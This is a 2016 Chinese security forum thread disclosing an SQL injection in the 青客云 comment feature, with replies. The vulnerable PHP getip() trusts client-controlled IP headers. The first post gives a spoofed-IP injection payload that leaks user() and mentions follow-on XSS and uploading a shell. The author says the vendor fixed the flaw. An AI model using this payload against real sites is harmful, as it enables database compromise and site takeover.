再发青客云sql注入漏洞
本帖最后由 wuyan 于 2016-6-7 21:36 编辑这次不是延时注入,问题是出现在评论时获取ip处,
在发表评论的时候,发现,ip可以伪造,并且被带入到feedback数据库里面,一枚完美的注入产生了,在发表评论的时候,ip伪造下
8.8.8.8\",'IANA',user(),'','1463286558','0','','0')#
内容随便写,爆出了user()
其中1463286558表示的是时间
其中获取ip的函数
function getip(){
if(!empty($_SERVER["HTTP_CLIENT_IP"]))$cip = $_SERVER["HTTP_CLIENT_IP"];
else if(!empty($_SERVER["HTTP_X_FORWARDED_FOR"]))$cip = $_SERVER["HTTP_X_FORWARDED_FOR"];
else if(!empty($_SERVER["REMOTE_ADDR"]))$cip = $_SERVER["REMOTE_ADDR"];
else $cip = "127.0.0.1";
return $cip;
}
过滤代码忘了在哪了,官网测试一下
当然内容和其他字段也是可以控制的,所以也可以xss,其他的拿登陆之类的操作,全是用json数据反馈,登陆后台之后可以直接上传拿shell,其他自己发挥想象吧。
忘了说一句,漏洞我已经联系客服修复了。 还在学习中 厉害,学习了
厉害厉害。支持 强!!学习下。 我拿去写插件,无言牛不会打我吧
RE: 再发青客云sql注入漏洞
sladjfksld 发表于 2016-6-10 18:12我拿去写插件,无言牛不会打我吧
不要写了,不要用bugscan那个垃圾东西了
Re: 再发青客云sql注入漏洞
感谢分享!这个SQL注入思路挺巧妙的,通过伪造IP头来注入,利用评论功能直接爆出user(),确实是个实打实的漏洞。而且还能扩展成XSS和后台拿shell,攻击面很广。楼主能主动联系客服修复,也很有责任心。请问当时这个漏洞影响的是哪个版本?还是所有版本都有问题?Re: 再发青客云sql注入漏洞
楼主这个挖得挺深的,评论IP伪造还能直接注入,而且用的还是`HTTP_CLIENT_IP`这类客户端可控的头,确实经典。函数里没过滤就直接拼进SQL,用户()都能爆出来,说明权限也不小。后面还能XSS和拿shell,基本整个后台都危险了。还好你已经通知厂商修复了,不然影响太大了。感谢分享思路。Re: 再发青客云sql注入漏洞
感谢分享!这个注入点确实很巧妙,伪造IP的同时还能通过评论功能直接操作数据库,获取user()等信息。代码里那段获取IP的函数没有过滤就直接拼接,漏洞产生得挺典型的。另外提到其他字段也可以控制,可能还有XSS和后台上传shell的风险,确实影响很大。已经联系客服修复了就好,希望官方这次彻底查一下类似的问题。
页:
[1]